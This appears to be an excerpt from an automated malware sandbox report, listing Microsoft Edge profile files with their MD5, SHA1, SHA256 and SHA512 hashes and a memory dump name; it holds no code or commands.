MD5 b704a36d360f3c4360b001cd9ad23641
SHA1 23ed8b2c57efc493e4f7346d526a9204eee6d4be
SHA256 52d35277329aa003c7f4b743a7adcb4859c7899e84b831a8f79c40186fa8f474
SHA512 73fde9aceb52815912f3b12e32f676e35cd47280ba30b9bb7b855e1148e164ce3baf824b74d05d6249585b4a7b2a997e47aef00880f267f07d5c2b3849a31607

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3ed9fe2c956a6df7c44116956aa50979
SHA1 c213aeaacfe73bd68ecc2ed0b51359cb1e0cb167
SHA256 91d95906553dbe330ef171dde68ce28c03e2eb5b5096d3214d5d5cfe0f9b143b
SHA512 aa4d8a8a5f7a55250ee15bea37a255209822a5e978c6d6da605f367ac381baab4803303ae0ff94167c8e2401302a56e2b12a21b12e7404fa4129677853bfb308

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cad3b20f792125d8556dead8c6f713f8
SHA1 c62399ca588673a0decb60ac57bf85bba09ae923
SHA256 627f9c8d3bd362b8ba18549aec206c9a491efde813bad98c0459fefa411bc6c2
SHA512 f0232a613543bd4dc78ec58b5fd225e2296a7df390245f1bd3bc1f3bd4c1b08d9f595080ce5b0a24154de8eca0b22612b346e3fd801969c68c26b517333e03da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5cbe9aab70f9f66bfbf00ff97a9aafaf
SHA1 f4639e7702e21d3ca8531d42b56b9b47e5875a3a
SHA256 88cc2a07cf5983f044ee9353af09e793aa35d8ab28064bf8e2a3ba277a691d06
SHA512 068cbc26a832f9a37b21322f70085c92d59fd0bac6d5f24087a4d45216108f5dfe495bebfa8b1acc155424e4bcedac8c3f0a0eaf293228e41ff906082ef2a156

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 88adc2e00cc1e97304bbaad33a38d296
SHA1 f26965245c05e08cd1e902039bcd6b316bc11177
SHA256 935cb6354404afd1262d5e75cc911e2cf1a6f8bff605c83818a901f909e0a8dc
SHA512 a67aa4ef0a655b44ce2b249eee0cc9115c2761b911b0b23917ee371e20df5bc3587f55f202c8802facf7027cc2ae5cdeeed76ac8c1e06528d33c8127f6a818a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 06bd1fa2b01c4eb42b21d2bcceabd9a0
SHA1 07acc233215a77c9bfa5db8c6c6597a770d32cb3
SHA256 18c698560a7603c50258592305178586746a2e77123a607c60971317018e7ac0
SHA512 3e4704243d65a158d57d48a6db0bd80ea12ada5cb7bc292e8c2643a9016f47038a3ee32c5abe96afb0667fcc65a517352baa0316c00296674c5e8e9398f3cda4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8fd0e36cdfa9cfc5451623950ac119fa
SHA1 5bd17e1a35081eefe032c0e60b6428048b9cd28d
SHA256 790f66070f531f7a66e5bc6a1ddbf5075265859ae37c824c3552056c87033f1a
SHA512 6c49bb752882b5fea99745eed5ab21e36ed28f57b4bce871420101d5b249874fc3863e5f6309317a43eb4792b327dd2e56c0fe3f5f3d08d2deebd756677d5c87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c664876281666ad7b4ac90ca7cdf8daf
SHA1 209a8a1f411f1da79485c286d5abf6636b59d4fa
SHA256 89aa0449a161435aa15fee250562efe683ff86af866aa5924e160e9829c171b8
SHA512 f50f8294a07ff54df461c2f67e8cfe2492949b6259ff2d3ca971a61334fbc1d0259acce2cfedea02e35ac073b6fda2bb3582df072970fd087fb49a4ea9f0c45e

memory/2068-765-0x0000000002750000-0x00000000027A6000-memory.dmp